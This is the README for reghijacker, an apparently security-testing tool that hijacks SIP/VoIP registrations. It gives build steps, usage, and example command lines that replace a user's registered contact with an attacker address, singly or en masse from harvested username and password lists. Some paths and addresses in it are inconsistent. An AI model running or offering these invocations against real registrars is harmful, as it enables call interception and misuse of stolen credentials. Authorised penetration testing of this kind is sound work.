Tool to hijack SIP registrations. If successful, all existing contacts
(i.e. bindings) for the target uri (i.e.user) are deleted from the location
service used by the targeted SIP Registrar/Proxy registry, and a specified
contact is added. That contact might be completely bogus or refer to an
actual VoIP endpoint.

    Copyright (c)  2004  Mark D. Collier/Mark O'Brien
    Permission is granted to copy, distribute and/or modify this document
    under the terms of the GNU Free Documentation License, Version 1.2
    or any later version published by the Free Software Foundation;
    with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.
    A copy of the license is included in the section entitled "GNU
    Free Documentation License".
 
Authors:  Mark D. Collier/Mark O'Brien   09/09/2004  v1.0
          www.securelogix.com - mark.collier@securelogix.com
          www.hackingexposedvoip.com

This tool was produced with honorable intentions, which are:

  o To aid owners of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in their deployments.

  o To aid 3rd parties to test, audit, and uncover security vulnerabilities
    in the VoIP infrastructure of owners of said infrastructure who contract
    with or otherwise expressly approve said 3rd parties to assess said
    VoIP infrastructure.

  o To aid producers of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in the VoIP hardware/software/systems they produce.

  o For use in collective educational endeavors or use by individuals for
    their own intellectual curiosity, amusement, or aggrandizement - absent
    nefarious intent.
   
Unlawful use of this tool is strictly prohibited.

The following open-source libraries of special note were used to build
reghijacker:

1) hack_library [utility routines - Str2IP( ) GetNextGuid( )]
   see www.hackingexposedvoip.com

    Note: The Makefile for reghijacker presumes
          that hack_library.o and hack_library.h reside in
          a folder at ../hack_library relative to the Makefile
          within the reghijacker directory.

Install and build the libraries in accordance with their respective
instructions. Then change to the redirectpoison directory and type: make
Warnings might presented as a function of the compiler vintage.

You may invoke the tool to hijack a single user, or you may input a file of
users to hijack en masse. For the en masse approach, create or acquire a
file of usernames/passwords: one username and password per line. A possible
source for usernames/passwords might be the output of the authtool
(i.e. Authentication Tool).

make the Makefile and you should be ready to go. Various warnings might
be presented as a function of the compiler vintage.

Registration Hijacker - Version 1.0
                        09/09/2004
 Usage:
 Mandatory -
        interface (e.g. eth0)
        domain to hijack (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of the domain's Registrar
        hijack contact info (e.g. hacker@128.32.64.96 )
        filename into which results are written
        one of the following sets of options:
                -f filename containing user names and passwords to hijack
                        or
                -u username
                -p password
 Optional -
        -s sleep interval btwn hijacks - in usec: default is none
        -v print in verbose mode


A typical invocation of reghijacker might be:

./reghijacker eth0 enterprise1.com 10.1.101.10 hacker@10.1.101.90 results -f users -v

where:

eth0                - interface to use for hijacking
enterprise1.com     - domain whose users are to be hijacked
10.1.101.10         - IPv4 address of domain's registrar
hacker@10.1.101.90  - contact info to substitute for the hijacked user's contact info
results             - the file where results are to be written
-f users            - the file of users to hijack and their passwords
-v                  - verbose mode

or perhaps

./reghijacker eth1 enterprise2.com 10.1.102.10 hijack@10.1.102.99 outfile -u kirk -p shootfirst -v

eth1                - interface to use for hijacking
enterprise2.com     - domain whose users are to be hijacked
10.1.102.10         - IPv4 address of domain's registrar
hijack@10.20.30.40  - contact info to substitute for the hijacked user's contact info
outfile             - the file where results are to be written
-u kirk             - the user to hijack
-p shootfirst       - kirk's password
-v                  - verbose mode

Note: Even if you are working in a non-authenticated domain, you must enter
      use the -p option if you use the -u option. Just enter anything for
      the -p option. Sorry.

-----------------------------------------------------------------------------

You may also make the mddriver and experiment with the MD5 digest
computation.

make -f makemd5c

then execute:

mddriver -x

to see the output of the MD5 digest calc for some different inputs.
Examine mddriver.c for the other mddriver command line parms.

Mark O'Brien
